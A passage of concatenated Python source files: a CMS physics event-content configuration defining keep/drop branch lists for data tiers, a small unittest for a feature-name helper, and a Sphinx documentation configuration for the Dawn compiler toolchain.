RAWSIMEventContent.outputCommands.extend(GeneratorInterfaceRAW.outputCommands) RAWSIMEventContent.outputCommands.extend(RecoGenJetsFEVT.outputCommands) RAWSIMEventContent.outputCommands.extend(RecoGenMETFEVT.outputCommands) RAWSIMEventContent.outputCommands.extend(DigiToRawFEVT.outputCommands) RAWSIMEventContent.outputCommands.extend(MEtoEDMConverterFEVT.outputCommands) RAWSIMEventContent.outputCommands.extend(IOMCRAW.outputCommands) RAWSIMEventContent.outputCommands.extend(CommonEventContent.outputCommands) RAWSIMHLTEventContent.outputCommands.extend(RAWSIMEventContent.outputCommands) RAWSIMHLTEventContent.outputCommands.extend(HLTDebugRAW.outputCommands) GENRAWEventContent.outputCommands.extend(RAWEventContent.outputCommands) GENRAWEventContent.outputCommands.extend(GeneratorInterfaceRECO.outputCommands) GENRAWEventContent.outputCommands.extend(SimG4CoreRECO.outputCommands) GENRAWEventContent.outputCommands.extend(SimTrackerRAW.outputCommands) GENRAWEventContent.outputCommands.extend(SimMuonRECO.outputCommands) GENRAWEventContent.outputCommands.extend(SimCalorimetryRECO.outputCommands) GENRAWEventContent.outputCommands.extend(SimFastTimingRECO.outputCommands) GENRAWEventContent.outputCommands.extend(SimGeneralRECO.outputCommands) GENRAWEventContent.outputCommands.extend(RecoGenMETFEVT.outputCommands) GENRAWEventContent.outputCommands.extend(RecoGenJetsFEVT.outputCommands) GENRAWEventContent.outputCommands.extend(MEtoEDMConverterFEVT.outputCommands) GENRAWEventContent.outputCommands.extend(IOMCRAW.outputCommands) GENRAWEventContent.outputCommands.extend(DigiToRawFEVT.outputCommands) GENRAWEventContent.outputCommands.extend(CommonEventContent.outputCommands) PREMIXEventContent.outputCommands.extend(SimGeneralRAW.outputCommands) PREMIXEventContent.outputCommands.extend(IOMCRAW.outputCommands) PREMIXEventContent.outputCommands.extend(CommonEventContent.outputCommands) PREMIXEventContent.outputCommands.extend(SimTrackerPREMIX.outputCommands) PREMIXEventContent.outputCommands.extend(SimCalorimetryPREMIX.outputCommands) PREMIXEventContent.outputCommands.extend(SimFastTimingPREMIX.outputCommands) PREMIXEventContent.outputCommands.extend(SimMuonPREMIX.outputCommands) PREMIXEventContent.outputCommands.extend(SimGeneralPREMIX.outputCommands) fastSim.toModify(PREMIXEventContent, outputCommands = PREMIXEventContent.outputCommands+fastSimEC.extraPremixContent) PREMIXRAWEventContent.outputCommands.extend(RAWSIMEventContent.outputCommands) PREMIXRAWEventContent.outputCommands.append('keep CrossingFramePlaybackInfoNew_*_*_*') PREMIXRAWEventContent.outputCommands.append('drop CrossingFramePlaybackInfoNew_mix_*_*') PREMIXRAWEventContent.outputCommands.append('keep *_*_MergedTrackTruth_*') PREMIXRAWEventContent.outputCommands.append('keep *_*_StripDigiSimLink_*') PREMIXRAWEventContent.outputCommands.append('keep *_*_PixelDigiSimLink_*') PREMIXRAWEventContent.outputCommands.append('keep *_*_MuonCSCStripDigiSimLinks_*') PREMIXRAWEventContent.outputCommands.append('keep *_*_MuonCSCWireDigiSimLinks_*') PREMIXRAWEventContent.outputCommands.append('keep *_*_RPCDigiSimLink_*') PREMIXRAWEventContent.outputCommands.append('keep DTLayerIdDTDigiSimLinkMuonDigiCollection_*_*_*') fastSim.toModify(PREMIXEventContent, outputCommands = PREMIXEventContent.outputCommands+fastSimEC.extraPremixContent) REPACKRAWSIMEventContent.outputCommands.extend(REPACKRAWEventContent.outputCommands) REPACKRAWSIMEventContent.outputCommands.extend(SimG4CoreRAW.outputCommands) REPACKRAWSIMEventContent.outputCommands.extend(SimTrackerRAW.outputCommands) REPACKRAWSIMEventContent.outputCommands.extend(SimMuonRAW.outputCommands) REPACKRAWSIMEventContent.outputCommands.extend(SimCalorimetryRAW.outputCommands) REPACKRAWSIMEventContent.outputCommands.extend(SimFastTimingRAW.outputCommands) REPACKRAWSIMEventContent.outputCommands.extend(SimGeneralRAW.outputCommands) REPACKRAWSIMEventContent.outputCommands.extend(GeneratorInterfaceRAW.outputCommands) REPACKRAWSIMEventContent.outputCommands.extend(RecoGenJetsFEVT.outputCommands) REPACKRAWSIMEventContent.outputCommands.extend(RecoGenMETFEVT.outputCommands) REPACKRAWSIMEventContent.outputCommands.extend(DigiToRawFEVT.outputCommands) REPACKRAWSIMEventContent.outputCommands.extend(MEtoEDMConverterFEVT.outputCommands) REPACKRAWSIMEventContent.outputCommands.extend(IOMCRAW.outputCommands) REPACKRAWSIMEventContent.outputCommands.extend(CommonEventContent.outputCommands) RECOSIMEventContent.outputCommands.extend(RECOEventContent.outputCommands) RECOSIMEventContent.outputCommands.extend(GeneratorInterfaceRECO.outputCommands) RECOSIMEventContent.outputCommands.extend(RecoGenMETRECO.outputCommands) RECOSIMEventContent.outputCommands.extend(RecoGenJetsRECO.outputCommands) RECOSIMEventContent.outputCommands.extend(SimG4CoreRECO.outputCommands) RECOSIMEventContent.outputCommands.extend(SimTrackerRECO.outputCommands) RECOSIMEventContent.outputCommands.extend(SimMuonRECO.outputCommands) RECOSIMEventContent.outputCommands.extend(SimCalorimetryRECO.outputCommands) RECOSIMEventContent.outputCommands.extend(SimFastTimingRECO.outputCommands) RECOSIMEventContent.outputCommands.extend(SimGeneralRECO.outputCommands) RECOSIMEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands) AODSIMEventContent.outputCommands.extend(AODEventContent.outputCommands) AODSIMEventContent.outputCommands.extend(GeneratorInterfaceAOD.outputCommands) AODSIMEventContent.outputCommands.extend(SimG4CoreAOD.outputCommands) AODSIMEventContent.outputCommands.extend(SimTrackerAOD.outputCommands) AODSIMEventContent.outputCommands.extend(SimMuonAOD.outputCommands) AODSIMEventContent.outputCommands.extend(SimCalorimetryAOD.outputCommands) AODSIMEventContent.outputCommands.extend(SimFastTimingAOD.outputCommands) AODSIMEventContent.outputCommands.extend(RecoGenJetsAOD.outputCommands) AODSIMEventContent.outputCommands.extend(RecoGenMETAOD.outputCommands) AODSIMEventContent.outputCommands.extend(SimGeneralAOD.outputCommands) AODSIMEventContent.outputCommands.extend(MEtoEDMConverterAOD.outputCommands) RAWRECOSIMHLTEventContent.outputCommands.extend(RAWRECOEventContent.outputCommands) RAWRECOSIMHLTEventContent.outputCommands.extend(GeneratorInterfaceRECO.outputCommands) RAWRECOSIMHLTEventContent.outputCommands.extend(RecoGenMETRECO.outputCommands) RAWRECOSIMHLTEventContent.outputCommands.extend(RecoGenJetsRECO.outputCommands) RAWRECOSIMHLTEventContent.outputCommands.extend(SimG4CoreRECO.outputCommands) RAWRECOSIMHLTEventContent.outputCommands.extend(SimTrackerRECO.outputCommands) RAWRECOSIMHLTEventContent.outputCommands.extend(SimMuonRECO.outputCommands) RAWRECOSIMHLTEventContent.outputCommands.extend(SimCalorimetryRECO.outputCommands) RAWRECOSIMHLTEventContent.outputCommands.extend(SimFastTimingRECO.outputCommands) RAWRECOSIMHLTEventContent.outputCommands.extend(SimGeneralRECO.outputCommands) RAWRECOSIMHLTEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands) RAWRECOSIMHLTEventContent.outputCommands.extend(HLTDebugRAW.outputCommands) RAWRECODEBUGHLTEventContent.outputCommands.extend(RAWRECOSIMHLTEventContent.outputCommands) RAWRECODEBUGHLTEventContent.outputCommands.extend(SimGeneralFEVTDEBUG.outputCommands) RAWRECODEBUGHLTEventContent.outputCommands.extend(SimTrackerDEBUG.outputCommands) FEVTEventContent.outputCommands.extend(RAWEventContent.outputCommands) FEVTEventContent.outputCommands.extend(RecoLocalTrackerRECO.outputCommands) FEVTEventContent.outputCommands.extend(RecoLocalMuonRECO.outputCommands) FEVTEventContent.outputCommands.extend(RecoLocalCaloRECO.outputCommands) FEVTEventContent.outputCommands.extend(RecoEcalRECO.outputCommands) FEVTEventContent.outputCommands.extend(TrackingToolsRECO.outputCommands) FEVTEventContent.outputCommands.extend(RecoTrackerRECO.outputCommands) FEVTEventContent.outputCommands.extend(RecoJetsRECO.outputCommands) FEVTEventContent.outputCommands.extend(RecoMETRECO.outputCommands) FEVTEventContent.outputCommands.extend(RecoMuonRECO.outputCommands) FEVTEventContent.outputCommands.extend(RecoBTauRECO.outputCommands) FEVTEventContent.outputCommands.extend(RecoBTagRECO.outputCommands) FEVTEventContent.outputCommands.extend(RecoTauTagRECO.outputCommands) FEVTEventContent.outputCommands.extend(RecoVertexRECO.outputCommands) FEVTEventContent.outputCommands.extend(RecoEgammaRECO.outputCommands) FEVTEventContent.outputCommands.extend(RecoPixelVertexingRECO.outputCommands) FEVTEventContent.outputCommands.extend(RecoParticleFlowRECO.outputCommands) FEVTEventContent.outputCommands.extend(BeamSpotRECO.outputCommands) FEVTEventContent.outputCommands.extend(L1TriggerRECO.outputCommands) FEVTEventContent.outputCommands.extend(HLTriggerRECO.outputCommands) FEVTEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands) FEVTEventContent.outputCommands.extend(EvtScalersRECO.outputCommands) FEVTEventContent.outputCommands.extend(OnlineMetaDataContent.outputCommands) FEVTEventContent.outputCommands.extend(TcdsEventContent.outputCommands) FEVTEventContent.outputCommands.extend(CommonEventContent.outputCommands) FEVTEventContent.outputCommands.extend(EITopPAGEventContent.outputCommands) ctpps_2016.toModify(FEVTEventContent, outputCommands = FEVTEventContent.outputCommands + RecoCTPPSFEVT.outputCommands) FEVTHLTALLEventContent.outputCommands.extend(FEVTEventContent.outputCommands) FEVTHLTALLEventContent.outputCommands.append('keep *_*_*_HLT') FEVTSIMEventContent.outputCommands.extend(RAWEventContent.outputCommands) FEVTSIMEventContent.outputCommands.extend(SimG4CoreRAW.outputCommands) FEVTSIMEventContent.outputCommands.extend(SimTrackerRAW.outputCommands) FEVTSIMEventContent.outputCommands.extend(SimMuonRAW.outputCommands) FEVTSIMEventContent.outputCommands.extend(SimCalorimetryRAW.outputCommands) FEVTSIMEventContent.outputCommands.extend(SimFastTimingRAW.outputCommands) FEVTSIMEventContent.outputCommands.extend(SimGeneralRAW.outputCommands) FEVTSIMEventContent.outputCommands.extend(GeneratorInterfaceRAW.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoGenJetsFEVT.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoGenMETFEVT.outputCommands) FEVTSIMEventContent.outputCommands.extend(DigiToRawFEVT.outputCommands) FEVTSIMEventContent.outputCommands.extend(MEtoEDMConverterFEVT.outputCommands) FEVTSIMEventContent.outputCommands.extend(IOMCRAW.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoLocalTrackerRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoLocalMuonRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoLocalCaloRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoEcalRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(TrackingToolsRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoTrackerRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoJetsRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoMETRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoMuonRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoBTauRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoBTagRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoTauTagRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoVertexRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoEgammaRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoPixelVertexingRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoParticleFlowRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(BeamSpotRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(L1TriggerRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(HLTriggerRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(GeneratorInterfaceRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoGenMETRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(RecoGenJetsRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(SimG4CoreRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(SimTrackerRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(SimMuonRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(SimCalorimetryRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(SimFastTimingRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(SimGeneralRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(MEtoEDMConverterRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(EvtScalersRECO.outputCommands) FEVTSIMEventContent.outputCommands.extend(CommonEventContent.outputCommands) FEVTSIMEventContent.outputCommands.extend(EITopPAGEventContent.outputCommands) FEVTSIMEventContent.outputCommands.extend(OnlineMetaDataContent.outputCommands) FEVTSIMEventContent.outputCommands.extend(TcdsEventContent.outputCommands) RAWDEBUGEventContent.outputCommands.extend(RAWSIMEventContent.outputCommands) RAWDEBUGEventContent.outputCommands.extend(SimTrackerDEBUG.outputCommands) RAWDEBUGEventContent.outputCommands.extend(SimGeneralFEVTDEBUG.outputCommands) RAWDEBUGEventContent.outputCommands.extend(L1TriggerRAWDEBUG.outputCommands) RAWDEBUGHLTEventContent.outputCommands.extend(RAWDEBUGEventContent.outputCommands) RAWDEBUGHLTEventContent.outputCommands.extend(HLTDebugRAW.outputCommands) FEVTDEBUGEventContent.outputCommands.extend(FEVTSIMEventContent.outputCommands) FEVTDEBUGEventContent.outputCommands.extend(L1TriggerFEVTDEBUG.outputCommands) FEVTDEBUGEventContent.outputCommands.extend(SimGeneralFEVTDEBUG.outputCommands) FEVTDEBUGEventContent.outputCommands.extend(SimTrackerFEVTDEBUG.outputCommands) FEVTDEBUGEventContent.outputCommands.extend(SimMuonFEVTDEBUG.outputCommands) FEVTDEBUGEventContent.outputCommands.extend(SimCalorimetryFEVTDEBUG.outputCommands) FEVTDEBUGEventContent.outputCommands.extend(SimFastTimingFEVTDEBUG.outputCommands) FEVTDEBUGHLTEventContent.outputCommands.extend(FEVTDEBUGEventContent.outputCommands) FEVTDEBUGHLTEventContent.outputCommands.extend(HLTDebugFEVT.outputCommands) FEVTDEBUGHLTEventContent.outputCommands.append('keep *_*_MergedTrackTruth_*') FEVTDEBUGHLTEventContent.outputCommands.append('keep *_*_StripDigiSimLink_*') FEVTDEBUGHLTEventContent.outputCommands.append('keep *_*_PixelDigiSimLink_*') RECODEBUGEventContent.outputCommands.extend(RECOSIMEventContent.outputCommands) RECODEBUGEventContent.outputCommands.extend(SimGeneralFEVTDEBUG.outputCommands) RECODEBUGEventContent.outputCommands.extend(SimTrackerDEBUG.outputCommands) from Configuration.ProcessModifiers.premix_stage2_cff import premix_stage2 from Configuration.Eras.Modifier_phase2_tracker_cff import phase2_tracker (premix_stage2 & phase2_tracker).toModify(FEVTDEBUGHLTEventContent, outputCommands = FEVTDEBUGHLTEventContent.outputCommands+[ 'keep *_*_Phase2OTDigiSimLink_*' ]) from Configuration.Eras.Modifier_phase2_muon_cff import phase2_muon (premix_stage2 & phase2_muon).toModify(FEVTDEBUGHLTEventContent, outputCommands = FEVTDEBUGHLTEventContent.outputCommands+[ 'keep *_*_GEMDigiSimLink_*', 'keep *_*_GEMStripDigiSimLink_*', 'keep *_*_ME0DigiSimLink_*', 'keep *_*_ME0StripDigiSimLink_*', ]) REPACKRAWSIMEventContent.outputCommands.extend(['drop FEDRawDataCollection_source_*_*', 'drop FEDRawDataCollection_rawDataCollector_*_*']) REPACKRAWEventContent.outputCommands.extend(['drop FEDRawDataCollection_source_*_*', 'drop FEDRawDataCollection_rawDataCollector_*_*']) #from modules in Configuration.StandardSequence.Generator_cff fixGenInfo REGENEventContent = cms.PSet( inputCommands=cms.untracked.vstring( 'keep *', 'drop *_genParticles_*_*', 'drop *_genParticlesForJets_*_*', 'drop *_kt4GenJets_*_*', 'drop *_kt6GenJets_*_*', 'drop *_iterativeCone5GenJets_*_*', 'drop *_ak4GenJets_*_*', 'drop *_ak7GenJets_*_*', 'drop *_ak8GenJets_*_*', 'drop *_ak4GenJetsNoNu_*_*', 'drop *_ak8GenJetsNoNu_*_*', 'drop *_genCandidatesForMET_*_*', 'drop *_genParticlesForMETAllVisible_*_*', 'drop *_genMetCalo_*_*', 'drop *_genMetCaloAndNonPrompt_*_*', 'drop *_genMetTrue_*_*', 'drop *_genMetIC5GenJs_*_*' ) ) def SwapKeepAndDrop(l): r=[] for item in l: if 'keep ' in item: r.append(item.replace('keep ','drop ')) elif 'drop ' in item: r.append(item.replace('drop ','keep ')) return r RESIMEventContent = cms.PSet( inputCommands=cms.untracked.vstring('drop *') ) RESIMEventContent.inputCommands.extend(IOMCRAW.outputCommands) RESIMEventContent.inputCommands.extend(GeneratorInterfaceRAW.outputCommands) #RESIMEventContent.inputCommands.extend(SwapKeepAndDrop(SimG4CoreRAW.outputCommands)) #RESIMEventContent.inputCommands.extend(SwapKeepAndDrop(GeneratorInterfaceRAW.outputCommands)) REDIGIEventContent = cms.PSet( inputCommands=cms.untracked.vstring('drop *') ) REDIGIEventContent.inputCommands.extend(SimG4CoreRAW.outputCommands) REDIGIEventContent.inputCommands.extend(IOMCRAW.outputCommands) REDIGIEventContent.inputCommands.extend(GeneratorInterfaceRAW.outputCommands) REDIGIEventContent.inputCommands.append('drop *_randomEngineStateProducer_*_*') ########### and mini AOD # # MiniAOD is a bit special: the files tend to be so small that letting # ROOT automatically determine when to flush is a surprisingly big overhead. # MINIAODEventContent= cms.PSet( outputCommands = cms.untracked.vstring('drop *'), eventAutoFlushCompressedSize=cms.untracked.int32(-900), compressionAlgorithm=cms.untracked.string("LZMA"), compressionLevel=cms.untracked.int32(4) ) MINIAODSIMEventContent= cms.PSet( outputCommands = cms.untracked.vstring('drop *'), eventAutoFlushCompressedSize=cms.untracked.int32(-900), compressionAlgorithm=cms.untracked.string("LZMA"), compressionLevel=cms.untracked.int32(4) ) MINIGENEventContent= cms.PSet( outputCommands = cms.untracked.vstring('drop *'), eventAutoFlushCompressedSize=cms.untracked.int32(15*1024*1024), compressionAlgorithm=cms.untracked.string("LZMA"), compressionLevel=cms.untracked.int32(4) ) from PhysicsTools.PatAlgos.slimming.slimming_cff import MicroEventContent,MicroEventContentMC,MicroEventContentGEN MINIAODEventContent.outputCommands.extend(MicroEventContent.outputCommands) MINIAODSIMEventContent.outputCommands.extend(MicroEventContentMC.outputCommands) MINIGENEventContent.outputCommands.extend(MicroEventContentGEN.outputCommands) #### RAW+miniAOD RAWMINIAODEventContent= cms.PSet( outputCommands = cms.untracked.vstring('drop *'), eventAutoFlushCompressedSize=cms.untracked.int32(20*1024*1024), compressionAlgorithm=cms.untracked.string("LZMA"), compressionLevel=cms.untracked.int32(4) ) RAWMINIAODSIMEventContent= cms.PSet( outputCommands = cms.untracked.vstring('drop *'), eventAutoFlushCompressedSize=cms.untracked.int32(20*1024*1024), compressionAlgorithm=cms.untracked.string("LZMA"), compressionLevel=cms.untracked.int32(4) ) RAWMINIAODEventContent.outputCommands.extend(MicroEventContent.outputCommands) RAWMINIAODEventContent.outputCommands.extend(L1TriggerRAW.outputCommands) RAWMINIAODEventContent.outputCommands.extend(HLTriggerRAW.outputCommands) RAWMINIAODSIMEventContent.outputCommands.extend(MicroEventContentMC.outputCommands) RAWMINIAODSIMEventContent.outputCommands.extend(SimG4CoreHLTAODSIM.outputCommands) RAWMINIAODSIMEventContent.outputCommands.extend(L1TriggerRAW.outputCommands) RAWMINIAODSIMEventContent.outputCommands.extend(HLTriggerRAW.outputCommands) RAWMINIAODEventContent.outputCommands.extend(cms.untracked.vstring( 'keep FEDRawDataCollection_rawDataCollector_*_*', 'keep FEDRawDataCollection_source_*_*' )) RAWMINIAODSIMEventContent.outputCommands.extend(cms.untracked.vstring( 'keep FEDRawDataCollection_rawDataCollector_*_*', 'keep FEDRawDataCollection_source_*_*' )) # # # RAWSIM Data Tier definition # Meant as means to temporarily hold the RAW + AODSIM information as to allow the # L1+HLT to be rerun at a later time. # RAWAODSIMEventContent = cms.PSet( outputCommands = cms.untracked.vstring('drop *'), eventAutoFlushCompressedSize=cms.untracked.int32(20*1024*1024), compressionAlgorithm=cms.untracked.string("LZMA"), compressionLevel=cms.untracked.int32(4) ) RAWAODSIMEventContent.outputCommands.extend(AODSIMEventContent.outputCommands) RAWAODSIMEventContent.outputCommands.extend(L1TriggerRAW.outputCommands) RAWAODSIMEventContent.outputCommands.extend(HLTriggerRAW.outputCommands) RAWAODSIMEventContent.outputCommands.extend(SimG4CoreHLTAODSIM.outputCommands) # in fastsim, normal digis are edaliases of simdigis # drop the simdigis to avoid complaints from the outputmodule related to duplicated branches for _entry in [FEVTDEBUGHLTEventContent,FEVTDEBUGEventContent,RECOSIMEventContent,AODSIMEventContent,RAWAODSIMEventContent]: fastSim.toModify(_entry, outputCommands = _entry.outputCommands + fastSimEC.dropSimDigis) for _entry in [MINIAODEventContent, MINIAODSIMEventContent]: fastSim.toModify(_entry, outputCommands = _entry.outputCommands + fastSimEC.dropPatTrigger) for _entry in [FEVTDEBUGEventContent,FEVTDEBUGHLTEventContent,FEVTEventContent]: phase2_tracker.toModify(_entry, outputCommands = _entry.outputCommands + [ 'keep Phase2TrackerDigiedmDetSetVector_mix_*_*', 'keep *_TTClustersFromPhase2TrackerDigis_*_*', 'keep *_TTStubsFromPhase2TrackerDigis_*_*' ]) from Configuration.Eras.Modifier_run2_GEM_2017_cff import run2_GEM_2017 from Configuration.Eras.Modifier_run3_GEM_cff import run3_GEM from Configuration.Eras.Modifier_phase2_muon_cff import phase2_muon from Configuration.Eras.Modifier_pp_on_AA_2018_cff import pp_on_AA_2018 for _entry in [FEVTDEBUGEventContent,FEVTDEBUGHLTEventContent,FEVTEventContent]: run2_GEM_2017.toModify(_entry, outputCommands = _entry.outputCommands + ['keep *_muonGEMDigis_*_*']) run3_GEM.toModify(_entry, outputCommands = _entry.outputCommands + ['keep *_muonGEMDigis_*_*']) phase2_muon.toModify(_entry, outputCommands = _entry.outputCommands + ['keep *_muonGEMDigis_*_*']) pp_on_AA_2018.toModify(_entry, outputCommands = _entry.outputCommands + ['keep FEDRawDataCollection_rawDataRepacker_*_*']) from RecoLocalFastTime.Configuration.RecoLocalFastTime_EventContent_cff import RecoLocalFastTimeFEVT, RecoLocalFastTimeRECO, RecoLocalFastTimeAOD from Configuration.Eras.Modifier_phase2_timing_layer_cff import phase2_timing_layer def _addOutputCommands(mod, newCommands): phase2_timing_layer.toModify(mod, outputCommands = mod.outputCommands + newCommands.outputCommands) _addOutputCommands(FEVTDEBUGEventContent,RecoLocalFastTimeFEVT) _addOutputCommands(FEVTDEBUGHLTEventContent,RecoLocalFastTimeFEVT) _addOutputCommands(FEVTEventContent,RecoLocalFastTimeFEVT) _addOutputCommands(RECOSIMEventContent,RecoLocalFastTimeRECO) _addOutputCommands(AODSIMEventContent,RecoLocalFastTimeAOD) from RecoMTD.Configuration.RecoMTD_EventContent_cff import RecoMTDFEVT, RecoMTDRECO, RecoMTDAOD _addOutputCommands(FEVTDEBUGEventContent,RecoMTDFEVT) _addOutputCommands(FEVTDEBUGHLTEventContent,RecoMTDFEVT) _addOutputCommands(FEVTEventContent,RecoMTDFEVT) _addOutputCommands(RECOSIMEventContent,RecoMTDRECO) _addOutputCommands(AODSIMEventContent,RecoMTDAOD)
py
7dfa1fc52977f0834ffac0629ebc18e3b843f785
import unittest from source.code.utils import generate_features_names class TestUtils(unittest.TestCase): def test_generate_features_names(self): num_features = ['with', 'height', 'age'] bin_features = ['gender'] cat_features = {'marital_status': 5, 'home_type': 3} res = generate_features_names(bin_features, cat_features, num_features) self.assertEqual(12, len(res), 'Something is wrong!!!')
py
7dfa214002680b97826398fc37f9270dfb27cbab
#!/usr/bin/env python3 # -*- coding: utf-8 -*- ##===-----------------------------------------------------------------------------*- Python -*-===## ## _ ## | | ## __| | __ ___ ___ ___ ## / _` |/ _` \ \ /\ / / '_ | ## | (_| | (_| |\ V V /| | | | ## \__,_|\__,_| \_/\_/ |_| |_| - Compiler Toolchain ## ## ## This file is distributed under the MIT License (MIT). ## See LICENSE.txt for details. ## ##===------------------------------------------------------------------------------------------===## # DAWN documentation build configuration file, created by # sphinx-quickstart on Sat Sep 27 13:56:47 2017. # # This file is execfile()d with the current directory set to its # containing dir. # # Note that not all possible configuration values are present in this # autogenerated file. # # All configuration values have a default; values that are commented out # serve to show the default. import sys import os # If extensions (or modules to document with autodoc) are in another directory, # add these directories to sys.path here. If the directory is relative to the # documentation root, use os.path.abspath to make it absolute, like shown here. sys.path.insert(0, os.path.abspath('_extension')) # -- General configuration ------------------------------------------------ # If your documentation needs a minimal Sphinx version, state it here. #needs_sphinx = '1.0' # Add any Sphinx extension module names here, as strings. They can be # extensions coming with Sphinx (named 'sphinx.ext.*') or your custom # ones. extensions = ['cmake', 'edit_on_github'] # Add any paths that contain templates here, relative to this directory. templates_path = ['_templates'] # The suffix(es) of source filenames. # You can specify multiple suffix as a list of string: # source_suffix = ['.rst', '.md'] source_suffix = '.rst' # The encoding of source files. #source_encoding = 'utf-8-sig' # The master toctree document. master_doc = 'index' # General information about the project. project = 'yoda' copyright = '2017, ETH Zurich and MeteoSwiss' author = 'Fabian Thuering, Carlos Osuna and Tobias Wicky' # The version info for the project you're documenting, acts as replacement for # |version| and |release|, also used in various other places throughout the # built documents. # # The short X.Y version. version = "" # The full version, including alpha/beta/rc tags. release = "" # The language for content autogenerated by Sphinx. Refer to documentation # for a list of supported languages. # # This is also used if you do content translation via gettext catalogs. # Usually you set "language" from the command line for these cases. language = None # There are two options for replacing |today|: either, you set today to some # non-false value, then it is used: #today = '' # Else, today_fmt is used as the format for a strftime call. #today_fmt = '%B %d, %Y' # List of patterns, relative to source directory, that match files and # directories to ignore when looking for source files. exclude_patterns = [] # The reST default role (used for this markup: `text`) to use for all # documents. #default_role = None # If true, '()' will be appended to :func: etc. cross-reference text. #add_function_parentheses = True # If true, the current module name will be prepended to all description # unit titles (such as .. function::). #add_module_names = True # If true, sectionauthor and moduleauthor directives will be shown in the # output. They are ignored by default. #show_authors = False # The name of the Pygments (syntax highlighting) style to use. pygments_style = 'sphinx' # A list of ignored prefixes for module index sorting. #modindex_common_prefix = [] # If true, keep warnings as "system message" paragraphs in the built documents. #keep_warnings = False # If true, `todo` and `todoList` produce output, else they produce nothing. todo_include_todos = False # Enable numfig numfig = True # -- Options for HTML output ---------------------------------------------- html_theme = "sphinx_rtd_theme" html_theme_options = { 'collapse_navigation': False, 'display_version': True, 'navigation_depth': 3, } html_theme_path = ["_themes", ] # The name for this set of Sphinx documents. If None, it defaults to # "<project> v<release> documentation". #html_title = None # A shorter title for the navigation bar. Default is the same as html_title. #html_short_title = None # The name of an image file (relative to this directory) to place at the top # of the sidebar. #html_logo = None # The name of an image file (relative to this directory) to use as a favicon of # the docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32 # pixels large. #html_favicon = None # Add any paths that contain custom static files (such as style sheets) here, # relative to this directory. They are copied after the builtin static files, # so a file named "default.css" will overwrite the builtin "default.css". html_static_path = ['_static'] # Add any extra paths that contain custom files (such as robots.txt or # .htaccess) here, relative to this directory. These files are copied # directly to the root of the documentation. #html_extra_path = [] # If not '', a 'Last updated on:' timestamp is inserted at every page bottom, # using the given strftime format. #html_last_updated_fmt = '%b %d, %Y' # If true, SmartyPants will be used to convert quotes and dashes to # typographically correct entities. #html_use_smartypants = True # Custom sidebar templates, maps document names to template names. #html_sidebars = {} # Additional templates that should be rendered to pages, maps page names to # template names. #html_additional_pages = {} # If false, no module index is generated. #html_domain_indices = True # If false, no index is generated. #html_use_index = True # If true, the index is split into individual pages for each letter. #html_split_index = False # If true, links to the reST sources are added to the pages. html_show_sourcelink = False # If true, "Created using Sphinx" is shown in the HTML footer. Default is True. #html_show_sphinx = True # If true, "(C) Copyright ..." is shown in the HTML footer. Default is True. #html_show_copyright = True # If true, an OpenSearch description file will be output, and all pages will # contain a <link> tag referring to it. The value of this option must be the # base URL from which the finished HTML is served. #html_use_opensearch = '' # This is the file name suffix for HTML files (e.g. ".xhtml"). #html_file_suffix = None # Language to be used for generating the HTML full-text search index. # Sphinx supports the following languages: # 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja' # 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr' #html_search_language = 'en' # A dictionary with options for the search language support, empty by default. # Now only 'ja' uses this config value #html_search_options = {'type': 'default'} # The name of a javascript file (relative to the configuration directory) that # implements a search results scorer. If empty, the default will be used. #html_search_scorer = 'scorer.js' # Output file base name for HTML help builder. htmlhelp_basename = 'yodadoc' # -- Options for LaTeX output --------------------------------------------- latex_elements = { # The paper size ('letterpaper' or 'a4paper'). 'papersize': 'a4paper', # The font size ('10pt', '11pt' or '12pt'). #'pointsize': '10pt', # Additional stuff for the LaTeX preamble. #'preamble': '\DeclareUnicodeCharacter{00A0}{}', # Latex figure (float) alignment #'figure_align': 'htbp', } # Grouping the document tree into LaTeX files. List of tuples # (source start file, target name, title, # author, documentclass [howto, manual, or own class]). latex_documents = [ (master_doc, 'dawn.tex', 'Dawn Documentation', 'Fabian Thuering, Carlos Osuna and Tobias Wicky\\\\~\\\\ETH Zurich and MeteoSwiss', 'manual'), ] # The name of an image file (relative to this directory) to place at the top of # the title page. # latex_logo = 'pybind11-logo.png' # For "manual" documents, if this is true, then toplevel headings are parts, # not chapters. #latex_use_parts = False # If true, show page references after internal links. #latex_show_pagerefs = False # If true, show URL addresses after external links. #latex_show_urls = False # Documents 